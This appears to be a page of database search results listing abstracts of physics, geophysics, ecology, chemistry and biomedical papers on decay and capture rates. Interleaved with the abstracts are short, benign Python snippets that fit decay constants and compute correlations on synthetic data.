Gerrard, Andrew; Lanzerotti, Louis; Gkioulidou, Matina; Mitchell, Donald; Manweiler, Jerry; Bortnik, Jacob; Keika, Kunihiro 2014-01-01 H-ion (∼45 keV to ∼600 keV), He-ion (∼65 keV to ∼520 keV), and O-ion (∼140 keV to ∼1130 keV) integral flux measurements, from the Radiation Belt Storm Probe Ion Composition Experiment (RBSPICE) instrument aboard the Van Allan Probes spacecraft B, are reported. These abundance data form a cohesive picture of ring current ions during the first 9 months of measurements. Furthermore, the data presented herein are used to show injection characteristics via the He-ion/H-ion abundance ratio and the O-ion/H-ion abundance ratio. 
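The decay times quoted next are essentially e-folding times of the measured fluxes; a minimal sketch of how such a time could be estimated from a hypothetical post-injection flux series by a log-linear least-squares fit is shown below (the data and variable names are illustrative, not the RBSPICE analysis itself).

import numpy as np

def efolding_time(t_days, flux):
    # Fit log(flux) = a - t/tau by linear least squares; slope = -1/tau.
    coeffs = np.polyfit(t_days, np.log(flux), 1)
    return -1.0 / coeffs[0]

# Hypothetical He-ion flux decaying with tau = 0.8 day, lightly noisy, sampled every ~30 min
t = np.linspace(0.0, 3.0, 144)
flux = 1.0e4 * np.exp(-t / 0.8) * np.exp(np.random.normal(0.0, 0.05, t.size))
print(f"estimated decay time: {efolding_time(t, flux):.2f} days")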
Of unique interest to ring current dynamics are the spatial-temporal decay characteristics of the two injected populations. We observe that He-ions decay more quickly at lower L shells, on the order of ∼0.8 day at L shells of 3–4, and decay more slowly with higher L shell, on the order of ∼1.7 days at L shells of 5–6. Conversely, O-ions decay very rapidly (∼1.5 h) across all L shells. The He-ion decay times are consistent with previously measured and calculated lifetimes associated with charge exchange. The O-ion decay time is much faster than predicted and is attributed to the inclusion of higher-energy (> 500 keV) O-ions in our decay rate estimation. We note that these measurements demonstrate a compelling need for calculation of high-energy O-ion loss rates, which have not been adequately studied in the literature to date. Key Points We report initial observations of ring current ions. We show that He-ion decay rates are consistent with theory. We show that O-ions with energies greater than 500 keV decay very rapidly. PMID:26167435 18. Initial measurements of O-ion and He-ion decay rates observed from the Van Allen probes RBSPICE instrument. PubMed Gerrard, Andrew; Lanzerotti, Louis; Gkioulidou, Matina; Mitchell, Donald; Manweiler, Jerry; Bortnik, Jacob; Keika, Kunihiro 2014-11-01 H-ion (∼45 keV to ∼600 keV), He-ion (∼65 keV to ∼520 keV), and O-ion (∼140 keV to ∼1130 keV) integral flux measurements, from the Radiation Belt Storm Probe Ion Composition Experiment (RBSPICE) instrument aboard the Van Allen Probes spacecraft B, are reported. These abundance data form a cohesive picture of ring current ions during the first 9 months of measurements. Furthermore, the data presented herein are used to show injection characteristics via the He-ion/H-ion abundance ratio and the O-ion/H-ion abundance ratio. Of unique interest to ring current dynamics are the spatial-temporal decay characteristics of the two injected populations. We observe that He-ions decay more quickly at lower L shells, on the order of ∼0.8 day at L shells of 3-4, and decay more slowly with higher L shell, on the order of ∼1.7 days at L shells of 5-6. Conversely, O-ions decay very rapidly (∼1.5 h) across all L shells. The He-ion decay times are consistent with previously measured and calculated lifetimes associated with charge exchange. The O-ion decay time is much faster than predicted and is attributed to the inclusion of higher-energy (> 500 keV) O-ions in our decay rate estimation. We note that these measurements demonstrate a compelling need for calculation of high-energy O-ion loss rates, which have not been adequately studied in the literature to date. We report initial observations of ring current ions. We show that He-ion decay rates are consistent with theory. We show that O-ions with energies greater than 500 keV decay very rapidly. 19. The minimum energy decay rate in quasi-isotropic grid turbulence Davidson, P. A. 2011-08-01 We consider high Reynolds number, freely-decaying, isotropic turbulence in which the large scales evolve in a self-similar manner when normalized by the integral scales, u and ℓ. As is well known, a range of possible behaviors may be observed depending on the form of the longitudinal velocity correlation at large separation, u²f∞ = u²f(r → ∞). We consider the cases u²f∞ = c_m r^(−m), 2 ≤ m ≤ 6, whose spectral counterpart is E(k → 0) ~ c_m k^(m−1) for m < 6, with or without a ln k correction, and E(k → 0) ~ I k⁴ for m = 6. (I is Loitsyansky's integral.) It has long been known that the c_m remain constant during the decay.
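One way to see how this invariance fixes the decay exponent quoted in the next sentence is the following short calculation, a sketch in the abstract's notation that combines u²ℓ^m = const with the empirical dissipation law εℓ/u³ ~ t^(−p) stated there:

u^2 \ell^{m} = \text{const} \;\Rightarrow\; \ell \sim u^{-2/m}, \qquad
\frac{du^2}{dt} \sim -\,\varepsilon \sim -\frac{u^3}{\ell}\,t^{-p} \sim -\,u^{\,3+2/m}\,t^{-p};
\quad u^2 \sim t^{-n} \;\Rightarrow\; -(n+1) = -\frac{n}{2}\Bigl(3+\frac{2}{m}\Bigr) - p
\;\Rightarrow\; n = \frac{2m(1-p)}{m+2}.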
This, in turn, sets the energy decay rate as u² ~ t^(−2m(1−p)/(m+2)), where p is the power-law exponent for the normalized dissipation rate, εℓ/u³ ~ t^(−p), observed empirically to be a small positive number in grid turbulence. We systematically explore the properties of these different classes of turbulence and arrive at the following conclusions. (i) The invariance of c_m is a direct consequence of linear momentum conservation for m ≤ 4, and angular momentum conservation for m = 5. (ii) The classical spectra of Saffman, E(k → 0) ~ c_3 k², and Batchelor, E(k → 0) ~ I k⁴, are robust in the sense that they emerge from a broad class of initial conditions. In particular, it is necessary only that ⟨ω_i ω'_j⟩∞ ≤ O(r^(−8)) at t = 0. The non-classical spectra (m = 2, 4, 5), on the other hand, require very specific initial conditions in order to be realized, of the form ⟨ω_i ω'_j⟩∞ = O(r^(−(m+2))). (Note the equality rather than the inequality here.) This makes the non-classical spectra less likely to be observed in practice. (iii) The case of m = 2, which is usually associated with the u² ~ t^(−1) decay law, is pathological in a number of respects. For example, its spectral tensor diverges as k → 0, and the long-range correlations ⟨u_i u'_j⟩∞ = O(r^(−2)) are too strong to be a consequence of the Biot-Savart law. (It is the Biot-Savart law that lies behind the long-range correlations in the 20. Tyrosyl rotamer interconversion rates and the fluorescence decays of N-acetyltyrosinamide and short tyrosyl peptides. PubMed Unruh, Jay R; Liyanage, Mangala Roshan; Johnson, Carey K 2007-05-17 It has long been recognized that the fluorescence lifetimes of amino acid residues such as tyrosine and tryptophan depend on the rotameric configuration of the aromatic side chain, but estimates of the rate of interchange of rotameric states have varied widely. We report measurements of the rotameric populations and interchange rates for tyrosine in N-acetyltyrosinamide (NATyrA), the tripeptide Tyr-Gly-Gly (YGG), and the pentapeptide Leu-enkephalin (YGGFL). The fluorescence lifetimes were analyzed to determine the rotameric interchange rates in the context of a model incorporating exchange among three rotameric states. Maximum entropy method analysis verified the presence of three fluorescence decay components for YGGFL and two for YGG and NATyrA. Rotameric exchange between the gauche(-) and trans states occurred on the nanosecond time scale, whereas exchange with the gauche(+) state occurred on a longer time scale. Good agreement was obtained with rotameric populations and exchange rates from molecular dynamics simulations. Quenching by iodide was used to vary the intrinsic fluorescence lifetimes, providing additional constraints on the determined interchange rates. The temperature dependence was measured to determine barriers to exchange of the two most populated rotamers of 3, 5, and 7 kcal/mol for NATyrA, YGG, and YGGFL, respectively. 1.
A specific absolute activity of 512.5 (25) kBq g-1 was determined using the 4π (LS)-γ digital coincidence counting technique. This absolute activity was used to determine an absolute intensity for the 97.4 keV γ-ray emission of 30.15 (20) per 100 decays. The reported absolute emission intensity of this transition in this work has a relative difference of 4% from the currently recommended value. 2. Measurement of the double K-shell vacancy creation probability in the electron-capture decay of 55Fe with active-pixel detectors Michel, Thilo; Bergmann, Benedikt; Durst, Jürgen; Filipenko, Mykaylo; Gleixner, Thomas; Zuber, Kai 2014-01-01 Background: In electron-capture decay, a second K-shell vacancy is eventually created with a small probability. Measurements of the double-vacancy creation probability per K-shell electron capture PKK of various nuclei undergoing electron-capture decays have already been performed, but the statistical accuracy of PKK of several nuclides is still not satisfying. Purpose: The purpose of this experiment was to improve the statistical error of PKK in the decay of 55Fe and to demonstrate the possibility of detecting double-vacancy creation events with position resolving pixel detectors. This enables angle resolved measurements. Method: For the first time, two active-pixel detectors (A,B) were used to detect satellite- and hypersatellite-line photons in coincidence either both in two clusters of triggered pixels in only one detector (A,B) or in both detectors (A∧B). PKK was determined for the two detectors regarded as one single, larger detector (PKK), for each detector separately (single-sided analysis: PKK ,A⊻B), and for both detectors in coincidence (double-sided analysis: PKK ,A∧B). Results: The result of the experiment is PKK=(1.531±0.079)×10-4 with a systematic error of (ΔPKK)syst=±0.023×10-4. This value is in agreement with the value previously measured by Campbell et al. of PKK=(1.3±0.2)×10-4. The discrepancy in literature between PKK of 54Mn to the expected value extrapolated from 55Fe almost vanished with our result. The asymmetry between the result of the single-sided analysis (PKK ,A⊻B) and the double-sided analysis (PKK ,A∧B) is consistent with zero: (PKK ,A⊻B-PKK ,A∧B)/(PKK ,A⊻B+PKK ,A∧B)=-0.003±0.051. This supports the assumption that angular correlations between the two photons are negligible within the achieved level of statistical accuracy for the given angular acceptance of our detectors. Conclusions: One can conclude that hybrid photon counting pixel detectors can be used to measure angular correlations between the directions 3. Tracing nitrogen accumulation in decaying wood and examining its impact on wood decomposition rate Rinne, Katja T.; Rajala, Tiina; Peltoniemi, Krista; Chen, Janet; Smolander, Aino; Mäkipää, Raisa 2016-04-01 Decomposition of dead wood, which is controlled primarily by fungi is important for ecosystem carbon cycle and has potentially a significant role in nitrogen fixation via diazotrophs. Nitrogen content has been found to increase with advancing wood decay in several studies; however, the importance of this increase to decay rate and the sources of external nitrogen remain unclear. Improved knowledge of the temporal dynamics of wood decomposition rate and nitrogen accumulation in wood as well as the drivers of the two processes would be important for carbon and nitrogen models dealing with ecosystem responses to climate change. 
To tackle these questions we applied several analytical methods on Norway spruce logs from Lapinjärvi, Finland. We incubated wood samples (density classes from I to V, n=49) in different temperatures (from 8.5oC to 41oC, n=7). After a common seven day pre-incubation period at 14.5oC, the bottles were incubated six days in their designated temperature prior to CO2 flux measurements with GC to determine the decomposition rate. N2 fixation was measured with acetylene reduction assay after further 48 hour incubation. In addition, fungal DNA, (MiSeq Illumina) δ15N and N% composition of wood for samples incubated at 14.5oC were determined. Radiocarbon method was applied to obtain age distribution for the density classes. The asymbiotic N2 fixation rate was clearly dependent on the stage of wood decay and increased from stage I to stage IV but was substantially reduced in stage V. CO2 production was highest in the intermediate decay stage (classes II-IV). Both N2 fixation and CO2 production were highly temperature sensitive having optima in temperature 25oC and 31oC, respectively. We calculated the variation of annual levels of respiration and N2 fixation per hectare for the study site, and used the latter data together with the 14C results to determine the amount of N2 accumulated in wood in time. The proportion of total nitrogen in wood 4. Can terrestrial biosphere models capture the response of atmospheric CO2 growth rate to ENSO? Fang, Y.; Michalak, A. M.; Schwalm, C. R.; Huntzinger, D. N.; Wei, Y.; Cook, R. B.; Schaefer, K. M.; Jacobson, A. R.; Ciais, P.; Fisher, J. B.; Hayes, D. J.; Huang, M.; Ito, A.; Jain, A.; Lei, H.; Lu, C.; Maignan, F.; Mao, J.; Parazoo, N.; Peng, S.; Poulter, B.; Ricciuto, D. M.; Shi, X.; Tian, H.; Zeng, N.; Zhao, F.; Wang, W. 2014-12-01 Previous studies have highlighted ENSO as a key driver of the interannual variability of atmospheric CO2 growth rate (AGR) through its influence on the biospheric carbon cycle. The biophysical mechanisms leading to this influence remain unclear, however. Understanding and correctly representing those mechanisms would provide crucial diagnostic tools to improve predictions of future changes to the global carbon cycle. Here we analyze the correlation between annual AGR and the Nino 3.4 index during 1959-2010 to elucidate the response of the biospheric carbon cycle to ENSO. We further compare these results with the responses implied by 11 process-based models participating the Multi-scale Synthesis and Terrestrial Model Intercomparison project (MsTMIP). We find that the annual AGR is strongly correlated with the ENSO index during the preceding September to February, with stronger land CO2 sources following stronger El Nino signals. This response results from teleconnections between tropical temperatures and ENSO, as well as from the influence of tropical temperatures on the biospheric carbon cycle. MsTMIP models capture this correlation, but overestimate it. This is due to an unrealistically high sensitivity of simulated NEE to tropical precipitation. In particular, the response of AGR to ENSO becomes asymmetric under positive and negative phases of ENSO, with their correlation with ENSO index peaking at different times for post-El Nino and post-La Nina years. This asymmetric response is not captured by models, and the simulated responses for post-El Nino years are highly inconsistent across models as well as between models and AGR. 
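A minimal sketch of the kind of lagged-correlation analysis described above is given below; the annual AGR series, the monthly Niño 3.4 index, and all variable names are hypothetical placeholders, with only the September-to-February averaging window taken from the abstract.

import numpy as np

def sep_feb_mean(nino34_monthly, years):
    # Average a monthly Nino 3.4 index over the preceding Sep-Feb window.
    # nino34_monthly: array of shape (n_years, 12); years: indices with year >= 1.
    out = []
    for y in years:
        window = np.concatenate([nino34_monthly[y - 1, 8:],   # Sep-Dec of year y-1
                                 nino34_monthly[y, :2]])       # Jan-Feb of year y
        out.append(window.mean())
    return np.array(out)

# Hypothetical data: 52 years of monthly Nino 3.4 anomalies and annual AGR (ppm/yr)
rng = np.random.default_rng(1)
nino = rng.standard_normal((52, 12))
years = np.arange(1, 52)
enso = sep_feb_mean(nino, years)
agr = 1.5 + 0.4 * enso + 0.2 * rng.standard_normal(enso.size)  # warm ENSO -> higher AGR
r = np.corrcoef(agr, enso)[0, 1]
print(f"correlation between AGR and preceding Sep-Feb Nino 3.4: r = {r:.2f}")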
Models therefore appear to have problems in simulating the biophysical mechanisms after El Nino years, mechanisms that are likely associated with anomalously dry conditions. As stronger and more frequent El Nino events are projected under climate change, these results suggest that model response to ENSO variability needs to be improved in 5. Rate Equation Theory for Island Sizes and Capture Zone Areas in Submonolayer Deposition: Realistic Treatment of Spatial Aspects of Nucleation SciTech Connect Evans, J W; Li, M; Bartelt, M C 2002-12-05 Extensive information on the distribution of islands formed during submonolayer deposition is provided by the joint probability distribution (JPD) for island sizes, s, and capture zone areas, A. A key ingredient determining the form of the JPD is the impact of each nucleation event on existing capture zone areas. Combining a realistic characterization of such spatial aspects of nucleation with a factorization ansatz for the JPD, we provide a concise rate equation formulation for the variation with island size of both the capture zone area and the island density. 6. Cooperative Lamb shift and the cooperative decay rate for an initially detuned phased state SciTech Connect Friedberg, Richard; Manassah, Jamal T. 2010-04-15 The cooperative Lamb shift (CLS) is hard to measure because in samples much larger than a resonant wavelength it is much smaller, for an initially prepared resonantly phased state, than the cooperative decay rate (CDR). We show, however, that if the phasing of the initial state is detuned so that the spatial wave vector is k_1 ≅ k_0 ± O(1/R) (where k_0 = ω_0/c and ω_0 is the resonant frequency), the CLS grows to 'giant' magnitudes making it comparable to the CDR. Moreover, for certain controlled values of detuning, the initial CDR becomes small so that the dynamical Lamb shift (DLS) can be measured over a considerable period of time. 7. Combined results on b-hadron production rates, lifetimes, oscillations and semileptonic decays SciTech Connect Willocq, Stephane 2000-08-02 Combined results on b-hadron lifetimes, b-hadron production rates, B_d^0–anti-B_d^0 and B_s^0–anti-B_s^0 oscillations, the decay width difference between the mass eigenstates of the B_s^0–anti-B_s^0 system, and the values of the CKM matrix elements |V_cb| and |V_ub| are obtained from published and preliminary measurements available in Summer 99 from the ALEPH, CDF, DELPHI, L3, OPAL and SLD Collaborations. 8. Spontaneous decay rate and Casimir-Polder potential of an atom near a lithographed surface Bennett, Robert 2015-08-01 Radiative corrections to an atom are calculated near a half-space that has arbitrarily shaped small depositions upon its surface. The method is based on calculation of the classical Green's function of the macroscopic Maxwell equations near an arbitrarily perturbed half-space using a Born-series expansion about the bare half-space Green's function. The formalism of macroscopic quantum electrodynamics is used to carry this over into the quantum picture. The broad utility of the calculated Green's function is demonstrated by using it to calculate two quantities: the spontaneous decay rate of an atom near a sharp surface feature and the Casimir-Polder potential of a finite grating deposited on a substrate.
Qualitatively different behavior is found for the latter case where it is observed that the periodicity of the Casimir-Polder potential persists even outside the immediate vicinity of the grating. 9. Indoor acrolein emission and decay rates resulting from domestic cooking events Seaman, Vincent Y.; Bennett, Deborah H.; Cahill, Thomas M. 2009-12-01 Acrolein (2-propenal) is a common constituent of both indoor and outdoor air, can exacerbate asthma in children, and may contribute to other chronic lung diseases. Recent studies have found high indoor levels of acrolein and other carbonyls compared to outdoor ambient concentrations. Heated cooking oils produce considerable amounts of acrolein, thus cooking is likely an important source of indoor acrolein. A series of cooking experiments were conducted to determine the emission rates of acrolein and other volatile carbonyls for different types of cooking oils (canola, soybean, corn and olive oils) and deep-frying different food items. Similar concentrations and emission rates of carbonyls were found when different vegetable oils were used to deep-fry the same food product. The food item being deep-fried was generally not a significant source of carbonyls compared to the cooking oil. The oil cooking events resulted in high concentrations of acrolein that were in the range of 26.4-64.5 μg m -3. These concentrations exceed all the chronic regulatory exposure limits and many of the acute exposure limits. The air exchange rate and the decay rate of the carbonyls were monitored to estimate the half-life of the carbonyls. The half-life for acrolein was 14.4 ± 2.6 h, which indicates that indoor acrolein concentrations can persist for considerable time after cooking in poorly-ventilated homes. 10. Spatio-temporal attributes of left ventricular pressure decay rate during isovolumic relaxation. PubMed Ghosh, Erina; Kovács, Sándor J 2012-03-01 Global left ventricular (LV) isovolumic relaxation rate has been characterized: 1) via the time constant of isovolumic relaxation τ or 2) via the logistic time constant τ(L). An alternate kinematic method, characterizes isovolumic relaxation (IVR) in accordance with Newton's Second Law. The model's parameters, stiffness E(k), and damping/relaxation μ result from best fit of model-predicted pressure to in vivo data. All three models (exponential, logistic, and kinematic) characterize global relaxation in terms of pressure decay rates. However, IVR is inhomogeneous and anisotropic. Apical and basal LV wall segments untwist at different times and rates, and transmural strain and strain rates differ due to the helically variable pitch of myocytes and sheets. Accordingly, we hypothesized that the exponential model (τ) or kinematic model (μ and E(k)) parameters will elucidate the spatiotemporal variation of IVR rate. Left ventricular pressures in 20 subjects were recorded using a high-fidelity, multipressure transducer (3 cm apart) catheter. Simultaneous, dual-channel pressure data was plotted in the pressure phase-plane (dP/dt vs. P) and τ, μ, and E(k) were computed in 1631 beats (average: 82 beats per subject). Tau differed significantly between the two channels (P < 0.05) in 16 of 20 subjects, whereas μ and E(k) differed significantly (P < 0.05) in all 20 subjects. These results show that quantifying the relaxation rate from data recorded at a single location has limitations. 
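As an illustration of how the exponential relaxation time constant can be extracted from such phase-plane data, the sketch below assumes the model P(t) = P_inf + P_0·exp(−t/τ), for which dP/dt = −(P − P_inf)/τ, so a straight-line fit of dP/dt against P yields τ from the slope; the synthetic pressure trace and all names are illustrative assumptions, not the catheter analysis itself.

import numpy as np

def tau_from_phase_plane(p, dt):
    # For P(t) = P_inf + P0*exp(-t/tau), dP/dt = -(P - P_inf)/tau, so dP/dt is
    # linear in P with slope -1/tau. p: LV pressure samples (mmHg) during
    # isovolumic relaxation; dt: sampling interval (s).
    dpdt = np.gradient(p, dt)
    slope, _ = np.polyfit(p, dpdt, 1)
    return -1.0 / slope

# Synthetic IVR segment: P_inf = 8 mmHg, P0 = 60 mmHg, tau = 45 ms, 1 kHz sampling
dt = 0.001
t = np.arange(0.0, 0.08, dt)
p = 8.0 + 60.0 * np.exp(-t / 0.045) + np.random.normal(0.0, 0.2, t.size)
print(f"tau = {1000.0 * tau_from_phase_plane(p, dt):.1f} ms")

Applying the same fit to pressures recorded at two catheter positions would give two τ values per beat, which is the comparison the abstract reports.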
Moreover, kinematic model based analysis allows characterization of restoring (recoil) forces and resistive (crossbridge uncoupling) forces during IVR and their spatio-temporal dependence, thereby elucidating the relative roles of stiffness vs. relaxation as IVR rate determinants. 11. Graphene plasmonics for tuning photon decay rate near metallic split-ring resonator in a multilayered substrate. PubMed Chen, Yongpin P; Sha, Wei E I; Jiang, Lijun; Hu, Jun 2015-02-09 Study of photon decay rate is essential to various optical devices, where graphene is an emerging building block due to its electrical tunability. In this paper, we study photon decay rate of a quantum emitter near a metallic split-ring resonator, which is embedded in a multilayered substrate incorporating a graphene layer. Analyzing photon decay rate in such a complex multilayered system is not only computationally challenging but also highly important to experimentally realizable devices. First, the dispersion relation of graphene plasmonics supported at a dieletric/graphene/dielectric structure is investigated systematically. Meanwhile, the dispersion relation of metallic plasmonics supported at a dielectric/metal structure is studied comparatively. According to our investigation, graphene offers several flexible tuning routes for manipulating photon decay rate, including tunable chemical potential and the emitter's position and polarization. Next, considering plasmonic waves in a graphene sheet occur in the infrared regime, we carefully design a metallic split ring resonating around the same frequency range. Consequently, this design enables a mutual interaction between graphene plasmonics and metallic plasmonics. The boundary element method with a multilayered medium Green's function is adopted in the numerical simulation. Blue-shifted and splitting resonance peaks are theoretically observed, which suggests a strong mode coupling. Moreover, the mode coupling has a switch on-off feature via electrostatically doping the graphene sheet. This work is helpful to dynamically manipulate photon decay rate in complex optical devices. 12. Decay Rates and Semi-stable Fraction Formation after 12 years of Foliar Litter Decomposition in Canadian Forests Trofymow, J. A.; Smyth, C.; Moore, T.; Prescott, C.; Titus, B.; Siltanen, M.; Visser, S.; Preston, C. M.; Nault, J. 2009-12-01 Litter decay in early and midphases of decomposition have been shown to highly influenced by climate and substrate quality, however factors affecting decay during the late semi-stable phase are less well understood. The Canadian Intersite Decomposition Experiment (CIDET) was established in 1992 with the objective of providing data on the long-term rates of litter decomposition and nutrient mineralization for a range of forested ecoclimatic regions in Canada. Such data were needed to help verify models used for national C accounting, as well as aid in the development of other soil C models. CIDET examined the annual decay, over a 12-year period, of 10 standard foliar litters and 2 wood substrates at 18 forested upland and 3 wetland sites ranging from the cool temperate to subarctic regions, a nearly 20oC span in temperature. On a subset of sites and litter types, changes in litter C chemistry over time were also determined. Over the first 6 years, C/N ratio and iron increased, NMR showed an overall decline in O-alkyl C (carbohydrates) and increase in alkyl, aromatic, phenolic, and carboxyl C. 
Proximate analysis showed the acid unhydrolyzable residue (AUR) increases, but true lignin did not accumulate, in contrast to the conceptual ligno-cellulose model of decomposition. Litter decay during first phase was related to initial litter quality (AUR and water soluble extract), winter precipitation, but not temperature, suggesting the importance of leaching during this phase. Decay rate “k” during the mid phase was related to temperature, initial litter quality (AUR and AUR/N), summer precipitation, but not soil N. In most cases decay had approached an asymptote before end of experiment. Although annual temperature was the best single predictor for 12-year asymptotes, summer precipitation and forest floor pH and C/N ratio were the best set of combined predictors. The changes in the decay factors during different phases may explain some of the discrepancies in the 13. Pressure Decay Testing Methodology for Quantifying Leak Rates of Full-Scale Docking System Seals NASA Technical Reports Server (NTRS) Dunlap, Patrick H., Jr.; Daniels, Christopher C.; Wasowski, Janice L.; Garafolo, Nicholas G.; Penney, Nicholas; Steinetz, Bruce M. 2010-01-01 NASA is developing a new docking system to support future space exploration missions to low-Earth orbit and the Moon. This system, called the Low Impact Docking System, is a mechanism designed to connect the Orion Crew Exploration Vehicle to the International Space Station, the lunar lander (Altair), and other future Constellation Project vehicles. NASA Glenn Research Center is playing a key role in developing the main interface seal for this docking system. This seal will be relatively large with an outside diameter in the range of 54 to 58 in. (137 to 147 cm). As part of this effort, a new test apparatus has been designed, fabricated, and installed to measure leak rates of candidate full-scale seals under simulated thermal, vacuum, and engagement conditions. Using this test apparatus, a pressure decay testing and data processing methodology has been developed to quantify full-scale seal leak rates. Tests performed on untreated 54 in. diameter seals at room temperature in a fully compressed state resulted in leak rates lower than the requirement of less than 0.0025 lbm, air per day (0.0011 kg/day). 14. Deprotonation yields, pKa, and aci-nitro decay rates in some substituted o-nitrobenzaldehydes. PubMed Abbruzzetti, Stefania; Carcelli, Mauro; Rogolino, Dominga; Viappiani, Cristiano 2003-07-01 In this paper we report the deprotonation yields, the pKa, and decay kinetics of the aci-nitro intermediates of some substituted 2-nitrobenzaldehydes that can be used as photoactivatable caged proton compounds. The decay of the aci-nitro absorbance for 2-nitrobenzaldehyde occurs within a few nanoseconds from photoexcitation. Addition of electron donating methoxy substituents at positions 4 and 5 leads to lower deprotonation yields, higher pKa, and slower decays of the aci-nitro intermediates. On the contrary, the decay rate is accelerated by the introduction of an electron-withdrawing Cl atom at position 4 in the phenyl ring, with little influence on the deprotonation yield and pKa of the aci-nitro intermediate. 15. Origin of meteoritic stardust unveiled by a revised proton-capture rate of 17O Lugaro, M.; Karakas, A. I.; Bruno, C. G.; Aliotta, M.; Nittler, L. R.; Bemmerer, D.; Best, A.; Boeltzig, A.; Broggini, C.; Caciolli, A.; Cavanna, F.; Ciani, G. 
F.; Corvisiero, P.; Davinson, T.; Depalo, R.; di Leva, A.; Elekes, Z.; Ferraro, F.; Formicola, A.; Fülöp, Zs.; Gervino, G.; Guglielmetti, A.; Gustavino, C.; Gyürky, Gy.; Imbriani, G.; Junker, M.; Menegazzo, R.; Mossa, V.; Pantaleo, F. R.; Piatti, D.; Prati, P.; Scott, D. A.; Straniero, O.; Strieder, F.; Szücs, T.; Takács, M. P.; Trezzi, D. 2017-01-01 Stardust grains recovered from meteorites provide high-precision snapshots of the isotopic composition of the stellar environment in which they formed 1 . Attributing their origin to specific types of stars, however, often proves difficult. Intermediate-mass stars of 4-8 solar masses are expected to have contributed a large fraction of meteoritic stardust 2,3 . Yet, no grains have been found with the characteristic isotopic compositions expected for such stars 4,5 . This is a long-standing puzzle, which points to serious gaps in our understanding of the lifecycle of stars and dust in our Galaxy. Here we show that the increased proton-capture rate of 17O reported by a recent underground experiment 6 leads to 17O/16O isotopic ratios that match those observed in a population of stardust grainsfor proton-burning temperatures of 60-80 MK. These temperatures are achieved at the base of the convective envelope during the late evolution of intermediate-mass stars of 4-8 solar masses 7-9 , which reveals them as the most likely site of origin of the grains. This result provides direct evidence that these stars contributed to the dust inventory from which the Solar System formed. 16. Capture-recapture-adjusted prevalence rates of type 2 diabetes are related to social deprivation. PubMed Ismail, A A; Beeching, N J; Gill, G V; Bellis, M A 1999-12-01 We examined the prevalence of type 2 diabetes and social deprivation in one urban district in Liverpool from October 1995 to September 1996 inclusive. This area has a stable Caucasian population of 176, 682. Lists were made of all known diabetics attending six different medical points of contact during the year, and were condensed and aggregated to eliminate duplicates. From postcode data, each patient was assigned to residence in one of the 14 electoral wards in the district, for which demographic structure and standardized measures of social deprivation were known (Townsend index). The crude period prevalences of type 1 and type 2 diabetes were estimated for each ward. Crude prevalence data were then corrected by applying capture-recapture (CR) techniques to the different patient datasets to allow for undercount. The crude period prevalence (95%CI) of diabetes was 1.5% (1.4-1.5%), or 2585/176, 682. The mean age of people with diabetes was not significantly different between electoral wards. The crude period prevalence of type 2 diabetes within individual wards ranged from 0.4% (0.3-0.6%) in the least deprived area to 4.1% (3.6-4.6%) in the most deprived area. The corresponding range of CR-adjusted period prevalence rates of type 2 diabetes was from 3.2% (2.8-3.6%) to 6.7% (6.1-7.4%), and there was strong correlation between both crude and CR-adjusted prevalence and social deprivation in each ward (r=0.76, p<0.001 for crude; and r=0. 49, p<0.005 for CR-adjusted prevalence). There was no correlation between the crude or CR-adjusted period prevalence rates of type 1 diabetes and Townsend index (r=0.14, p=NS). This strong correlation between the prevalence of type 2 diabetes and social deprivation has important implications for the planning of health-care delivery. 17. 
Coupled-Channels Study of α-Decay Rates for Deformed Nuclei Ni, Dongdong; Ren, Zhongzhou The generalized density-dependent cluster model is devoted to calculating α-decay half-lives of spherical and deformed nuclei. The multi-channel cluster model is developed to describe the α-decay fine structure in heavy deformed nuclei, including half-lives and branching ratios. After a brief review of these two models, special cases of the α-decay fine structure are presented. Calculations are separately performed using the coupled-channels and WKB approaches. 18. Anomalous effects of radioactive decay rates and capacitance values measured inside a modified Faraday cage: Correlations with space weather Scholkmann, F.; Milián-Sánchez, V.; Mocholí-Salcedo, A.; Milián, C.; Kolombet, V. A.; Verdú, G. 2017-03-01 Recently we reported (Milián-Sánchez V. et al., Nucl. Instrum. Methods A, 828 (2016) 210) our experimental results involving 226Ra decay rate and capacitance measurements inside a modified Faraday cage. Our measurements exhibited anomalous effects of unknown origin. In this letter we report new results regarding our investigation into the origins of the observed effects. We report preliminary findings of a correlation analysis between the radioactive decay rates and capacitance time series and space weather related variables (geomagnetic field disturbances and cosmic-ray neutron counts). A significant correlation was observed for specific data sets. The results are presented and possible implications for future work discussed. 19. Energy-level shifts and the decay rate of an atom in the presence of a conducting wedge 2015-12-01 In the present article explicit expressions for the decay rate and energy-level shifts of an atom in the presence of an ideal conducting wedge, two parallel plates, and a half sheet are obtained in the framework of the canonical quantization approach. The angular and radial dependences of the decay rate for different atomic polarizations of an excited atom and also of the energy-level shifts are depicted and discussed. The consistency of the present approach in some limiting cases is investigated by comparing the relevant results obtained here to the previously reported results. 20. SU(3) flavor symmetry and CP violating rate differences for charmless B→PV decays SciTech Connect Deshpande, N. G.; He, Xiao-Gang; Shi, Jian-Qing 2000-08-02 We derive several relations between CP violating rate differences Δ(B→PV) = Γ(B→PV) − Γ(B̄→P̄V̄) for charmless B→PV decays in the standard model using SU(3) flavor symmetry. It is found that although the relations between branching ratios of ΔS=0 and ΔS=-1 processes are complicated, there are simple relations independent of hadronic models between some of the ΔS=0 and ΔS=-1 rate differences due to the unitarity property of the Kobayashi-Maskawa matrix, such as Δ(B→π+ρ-) = −Δ(B→π+K*-), Δ(B→π-ρ+) = −Δ(B→K-ρ+). SU(3) breaking effects are also estimated using the factorization approximation. These relations can be tested at B factories in the near future. (c) 2000 The American Physical Society. 1.
A Novel Pulse-Chase SILAC Strategy Measures Changes in Protein Decay and Synthesis Rates Induced by Perturbation of Proteostasis with an Hsp90 Inhibitor PubMed Central Fierro-Monti, Ivo; Racle, Julien; Hernandez, Celine; Waridel, Patrice; Hatzimanikatis, Vassily; Quadroni, Manfredo 2013-01-01 Standard proteomics methods allow the relative quantitation of levels of thousands of proteins in two or more samples. While such methods are invaluable for defining the variations in protein concentrations which follow the perturbation of a biological system, they do not offer information on the mechanisms underlying such changes. Expanding on previous work [1], we developed a pulse-chase (pc) variant of SILAC (stable isotope labeling by amino acids in cell culture). pcSILAC can quantitate in one experiment and for two conditions the relative levels of proteins newly synthesized in a given time as well as the relative levels of remaining preexisting proteins. We validated the method studying the drug-mediated inhibition of the Hsp90 molecular chaperone, which is known to lead to increased synthesis of stress response proteins as well as the increased decay of Hsp90 “clients”. We showed that pcSILAC can give information on changes in global cellular proteostasis induced by treatment with the inhibitor, which are normally not captured by standard relative quantitation techniques. Furthermore, we have developed a mathematical model and computational framework that uses pcSILAC data to determine degradation constants kd and synthesis rates Vs for proteins in both control 